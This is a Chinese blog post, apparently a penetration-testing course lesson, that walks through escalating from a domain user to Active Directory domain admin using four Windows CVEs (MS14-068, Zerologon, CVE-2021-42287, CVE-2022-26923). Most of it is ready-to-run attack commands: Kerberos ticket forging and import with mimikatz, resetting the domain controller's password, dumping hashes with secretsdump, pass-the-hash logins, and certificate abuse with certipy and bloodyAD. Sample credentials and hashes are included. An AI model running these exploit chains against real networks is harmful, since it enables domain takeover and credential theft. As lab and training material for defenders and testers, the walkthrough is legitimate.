第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞

于 2024-06-21 13:49:16 发布
阅读量838 收藏 10
点赞数 22
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/139678521
版权

目录

案例一:WIN-域控提权-CVE-2014-6324

案例二:WIN-域控提权-CVE-2020-1472

案例三:WIN-域控提权-CVE-2021-42287

案例四:WIN-域控提权-CVE-2022-26923

案例一:WIN-域控提权-CVE-2014-6324

首先先部署域控

项目下载地址

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/mimikatz
https://github.com/crupper/Forensics-Tool-Wiki/tree/master/windowsTools

获得域用户的suid值

whoami /user

通过查看时间查看域控主机名

net time /domain

 ping域控主机名来查看ip

获取计算机的一些信息

net config workstation

利用工具伪造kerberos协议认证证书

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
ms14-068.exe -u jie@qq.com -p 1234.com -s S-1-5-21-3844935259-2139444640-2602687446-1104 -d 192.168.172.138

启动mimikatz

清空当前的票据缓存

kerberos::purge  清空

kerberos::list   列出

导入伪造的票据

kerberos::ptc "TGT_jie@qq.com.ccache"

查看c盘文件

dir \\dc1.qq.com\C$

利用psexec连接域控

PsExec.exe \\dc1.qq.com cmd

查看ip已经变成了域控机的ip

案例二:WIN-域控提权-CVE-2020-1472

影响范围以及利用条件

CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞,
影响 Windows Server 2008R2 Windows Server 2019 的多个版本系统,
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 .
该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows.

资源下载地址

POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
Impacket:https://github.com/fortra/impacket

获得计算机名

nbtscan -v -h 192.168.3.21

测试漏洞是否能够正常使用

python3 zerologon_tester.py DC1 192.168.172.138

重置空密码

python3 cve-2020-1472-exploit.py DC1 192.168.172.138

连接后导出哈希

python3 secretsdump.py qq.com/DC1\$@192.168.172.138 -no-pass

这里尝试利用administrator进行登录

python3 wmiexec.py Administrator@192.168.172.138 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

也可以在前面加上域名进行访问

案例三:WIN-域控提权-CVE-2021-42287

利用条件

可以访问域控主机
需要域用户账号密码

资源下载地址:https://github.com/safebuffer/sam-the-admin

命令

python3 sam_the_admin.py 域名/'域控主机账号:密码'  -dc-ip 域控ip -shell

python3 sam_the_admin.py qq/'administrator:123.com' -dc-ip 192.168.172.138 -shell

案例四:WIN-域控提权-CVE-2022-26923

利用条件

知道一个域控普通用户的账号密码

并且域控内有ca证书服务器

利用命令查看ca名以及计算机min

certutil -config - -ping

资源下载地址:GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

安装必要的插件

python3 .\setup.py install

 申请一个证书

certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca abc-DC1-CA -template User -debug

certipy req '192.168.172.145/jie:123.com@dc1.abc.com' -target-ip 192.168.172.145 -ca abc-DC1-CA -template User -debug

检测证书

certipy auth -pfx jie.pfx -dc-ip 192.168.172.145 -debug

添加计算机账号

项目地址:GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation Framework

python3 bloodyAD.py -d abc.com -u jie -p '123.com' --host 192.168.172.145 addComputer pwnmachine 'CVEPassword1234*'

 

 设置属性

python3 bloodyAD.py -d abc.com -u jie -p '123.com' --host 192.168.172.145 setAttribute 'CN=pwnmachine,CN=Computers,DC=abc,DC=com' dNSHostName '["dc1.abc.com"]'

利用添加的计算机账户来申请证书

certipy req '192.168.172.145/pwnmachine$:CVEPassword1234*@dc1.abc.com' -target-ip 192.168.172.145 -ca abc-DC1-CA -template Machine -debug

检测该证书的有效性

certipy auth -pfx dc1.pfx -dc-ip 192.168.172.145 -debug

利用机器用户的hash来导出系统的哈希

项目下载地址: GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

sudo python3 secretsdump.py 'dc1$@192.168.172.145' -hashes :41907e434e325b51c0aeed7d2cc0fac3

利用admin的hash进行连接

python3 wmiexec.py Administrator@192.168.172.145 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

权限提升结束,参考文章:Active Directory 域服务特权提升漏洞 CVE-2022–26923

 

 

xiaojiesec
关注
  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ADCS-CVE-2022-26923域内提权漏洞-域控
问题很多的小明
07-10 404
本文复现了ADCS域内漏洞CVE-2022-26923
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞
最新发布
HACKONE的博客
06-24 525
Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。set payload windows/x64/meterpreter/bind_tcp //正向连接上线。run post/multi/manage/autoroute //添加当前路由表。
权限提升-Win系统权限提升篇&AD内网域控&NetLogon&ADCS&PAC&KDC&CVE漏洞
siu~
03-28 1340
1、WIN-域内用户到AD域控-CVE-2014-6324 2、WIN-域内用户到AD域控-CVE-2020-1472 3、WIN-域内用户到AD域控-CVE-2021-42287 4、WIN-域内用户到AD域控-CVE-2022-26923 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
权限提升WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞
今天是几号的博客
03-06 807
CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,影响Windows Server 2008R2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统Windows.#WIN-域控提权-CVE-2022-26923。Kali添加访问域内信息 /etc/hosts。1、需要域用户账号密码。2、域内存在证书服务器。1、一个域内普通账号。
Windows域控常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 2791
本文对近几年出现的Windows域控相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
探秘ZeroLogon:Windows域控安全漏洞的克星
gitblog_00088的博客
04-04 547
探秘ZeroLogon:Windows域控安全漏洞的克星 项目地址:https://gitcode.com/Rvn0xsy/ZeroLogon 零日攻击(Zero-Day)是网络安全领域的一种严重威胁,而ZeroLogon则是2020年发现的一个影响Windows域控制器的重大漏洞。本文将深入探讨ZeroLogon项目,这是一个开源工具,旨在帮助系统管理员检测并修复此漏洞。 项目简介 ZeroLo...
DNS域传送漏洞
爱测未来团队博客
09-21 8268
关于DNS,你想了解的,都在这里……
ms14-068漏洞获取域控管理员密码
weixin_34268610的博客
03-04 371
工具下载地址:https://github.com/bidord/pykek/ root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc Password:    [+] Build...
内网安全——横向移动&系统漏洞&域控提权CVE-2021-42287&CVE-2022-26923
m0_61506558的博客
02-10 612
windows系统的Active Directory证书服务(cs) 在域上运行时,由于机器账号中的aiNSHostName属性不具有唯一一性,域中普通用户可以将其更改为高权限域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限Win8.1、winl0、 win11、winServer2012R2、winServer2016、WinServex2019、WinServer2022等版本。再进入会话进行漏洞检测。
2022年全国职业技能大赛-网络系统管理赛项:Windows Server&配置AD域 副域控
君逍遥o
11-19 552
2022年全国职业技能大赛-网络系统管理赛项:Windows Server&配置AD域 副域控
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local域这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
CVE-2020-1472域渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 244
模拟环境:获取了一个加入了域的计算机权限,在system账号权限的情况下,将域管密码置空,导出域管hash,然后进行连接
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7131
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)
Sentiment的博客
12-16 628
CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。获取了一个加入了域的计算机权限,在域普通账号的情况下,将域管密码置空,导出域管hash,然后进行连接。
域渗透04-漏洞CVE-2020-1472)
GalaxySpaceX的博客
10-12 520
域渗透04-漏洞CVE-2020-1472)
域控安全之域渗透
m0_59598029的博客
02-25 639
在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。
红队|域渗透重要漏洞汇总
st3pby的博客
11-22 581
域渗透重要漏洞汇总
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows域控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值